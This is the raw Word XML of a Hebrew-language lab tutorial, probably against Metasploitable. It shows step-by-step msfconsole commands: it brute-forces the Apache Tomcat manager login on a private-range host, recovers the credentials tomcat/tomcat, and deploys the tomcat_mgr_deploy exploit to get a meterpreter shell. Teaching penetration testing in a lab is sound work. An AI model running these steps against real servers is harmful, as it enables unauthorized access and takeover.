                <wp:positionH relativeFrom="column">
                  <wp:posOffset>396240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="716280" cy="381000"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="40" name="מלב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D9F7C" id="מלבן 40" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:31.2pt;margin-top:10.25pt;width:56.4pt;height:30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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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07744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D4888A9" wp14:editId="22AF9409">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6637020" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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53A74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5B80322E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011F7D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2C5DA083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EE39E47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D3BD7B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BCF8417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030B1C7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5C4F6D86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E29904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B9132DC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אפשר לראות שהאתר עלה וניתן לזהות את גרסת השרת 5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5902F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דבר ראשון נצטרך לחשוף את השם משתמש והסיסמא </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD32D1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lastRenderedPageBreak/>
        <w:t>(גם אני לא יודע מה השם משתמש והסיסמא)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975E57C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  <w:rtl/>
        </w:rPr>
        <w:t>אז ניגש ל</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF191E0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ונצבע חיפוש ל</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">tomcat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30761152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הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C83538D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09792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44CEF28A" wp14:editId="523B66B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637020" cy="2407920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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91D1F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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654EDA05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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0ECEA8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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1AB887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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0826076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35F6FDFE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5F7AD19D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05C853CC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714371D4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בפלט שמוצג לנו נבחר את מודול 9 ונשתמש בפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372BF1D" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>auxiliary/scanner/http/</w:t>
      </w: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tomcat_mgr_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A80FF" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251810816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4BE10287" wp14:editId="122AD2C8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6522711" cy="289560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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11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378BA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6CB32FC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לאחר מכן נציג את האפשרויות </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6FEF52" w14:textId="3672B192" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00B06C42" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"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 wp14:anchorId="0FE4FF0D" wp14:editId="6ADFBCEF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>280823</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7177333" cy="1950720"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapNone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333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8E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D0DB5" w14:textId="48491335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A43A867" w14:textId="3FEE1B6E" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4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20A0547B" w14:textId="4B94EF32" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00B06C42" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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5EB8CB3" wp14:editId="77B58772">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>480060</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>213995</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2857500" cy="190500"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="123" name="מלבן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80EB8" id="מלבן 123" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:37.8pt;margin-top:16.85pt;width:225pt;height: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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D5BD16" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4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3FC3DCFE" w14:textId="6929D99D" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4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5801DA9B" w14:textId="2BA91C3E" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00B06C42" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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052DDEB" wp14:editId="45767213">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>476250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>24130</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2975610" cy="384810"/>
                <wp:effectExtent l="19050" t="19050" r="15240" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="124" name="מלבן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384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FB45E" id="מלבן 124" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:37.5pt;margin-top:1.9pt;width:234.3pt;height:30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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2C6072" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4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737CE41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שימו לב שכאן מוגדרים מראש קבצי שמות משתמשים וסיסמאות כברירת מחדל</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1946DE56" w14:textId="36D6156C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  <w:rtl/>
        </w:rPr>
        <w:t>עכשיו נוסיף את כתובת המכונה ונשנה את הפורט ל818</w:t>
      </w:r>
      <w:r w:rsidR="0023555F" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ולא 8080 ונפעיל את ההתקפה</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC4183" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set RHOSTS 192.168.1.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA283E" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set RPORT 8180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E68A58" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000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6F7A03F2" wp14:editId="36F63E0C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6644640" cy="946054"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:wrapNone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4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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E56382B" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB5C087" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784F8868" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E30EDBA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lastRenderedPageBreak/>
        <w:t>אז אפשר לראות שמצאנו את השם משתמש והסיסמא</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561CBA6E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שם משתמש: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27290134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סיסמא: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1FE94D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15936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1FB711D3" wp14:editId="4D339FB9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2226310</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4442460" cy="6126480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone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61EC4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17171F58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6D1A3A26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2235B313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0123AFB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51185106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2CE93BB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0AA45C9C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5E81759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2788B5B7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42AFE620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711C3FC0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63C698B1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834E67" wp14:editId="6C031EB0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2232660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>50165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3474720" cy="228600"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="49" name="מלבן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2EDAF" id="מלבן 49" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:175.8pt;margin-top:3.95pt;width:273.6pt;height:1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" filled="f" strokecolor="#ffc000" strokeweight="3pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DCA686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2FED55EC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3F060026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4407B3C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8C486F0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6796C5F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3B3F416B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04BD759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3552C3F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עכשיו בואו נעבור לשלב הבא וננסה לקבל </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לביצוע פקודות</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F598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נחזור ל</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונבצע חיפוש ל </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http/tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A9EEF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19008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="025FC774" wp14:editId="2F735527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6959205" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone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20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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search http/tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205FF937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</w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE863E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A4DAC93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30E24F7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750EFCFD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5B0C6CAC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06B1D89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lastRenderedPageBreak/>
        <w:t>כעת נבחר את שורה 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE744A" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251817984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="769692DB" wp14:editId="098CDCAA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-56094</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>288290</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6703909" cy="281940"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:wrapNone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127" cy="28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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use exploit/multi/http/</w:t>
      </w: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tomcat_mgr_deploy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E502282" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4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4348B728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57A762E1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כעת נציג את אפשרויות </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B893A6A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ונראה שה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">payloads </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כבר הוגדר</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A92C4D4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במקרה הזה ננסה נקבל </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מסוג </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B95EE6E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BFA1808" wp14:editId="4478E68A">
            <wp:extent cx="6644640" cy="2407920"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="63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8BDA3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פה נצטרך להגדיר את השם משתמש והסיסמא שמצאנו מקודם</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C00196" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w: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HttpPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3909BC7F" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w: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HttpUsername</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45912848" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set RHOSTS 192.168.1.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC32B52" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set RPORT 8180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1661C87A" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4054A226" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251820032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D310AE1" wp14:editId="0D7B564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576060" cy="1731134"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="64" name="תמונה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471" cy="174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D5DA1" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
